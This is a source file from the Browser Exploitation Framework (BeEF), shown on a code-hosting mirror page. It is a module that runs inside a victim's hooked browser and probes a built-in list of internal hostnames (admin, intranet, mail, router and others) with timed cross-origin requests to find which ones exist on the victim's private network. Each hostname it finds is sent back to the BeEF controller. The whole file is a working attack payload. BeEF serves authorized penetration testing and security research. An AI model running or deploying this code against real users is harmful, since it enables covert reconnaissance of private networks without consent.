Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/network/dns_enumeration/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8


9
    var dns_list = "<%= @dns_list %>";

10
    var timeout = parseInt("<%= @timeout %>");

11


12
    var cont=0;

13
    var port = 900;

14
    var protocol="http://";

15
    var hostnames;

16


17
    if(dns_list!="%default%") {

18
        hostnames = dns_list.split(",");

19
    } else {

20
        hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml");

21
    }

22


23
    function notify() {

24
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]);

25
        check_next();

26
    }

27


28
    function check_next() {

29
        cont++;

30
        if(cont<hostnames.length) do_resolv(protocol + hostnames[cont] + ":" + port);

31
        else setTimeout(function(){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000);

32
    }

33


34
    function do_resolv(url) {

35
        // Cross Origin Resource Sharing call

36
        var xhr = new XMLHttpRequest();

37
        if("withCredentials" in xhr) {

38
            xhr.open("GET", url, true);

39
        } else if(typeof XDomainRequest != "undefined") {

40
            xhr = new XDomainRequest();

41
            xhr.open("GET",url);

42
        } else {

43
            return -1;

44
        }

45


46
        xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } };

47
        xhr.send();

48
        var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout);

49
    }

50


51
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded');

52
    if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) {

53
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported');

54
    }

55


56
});

57


58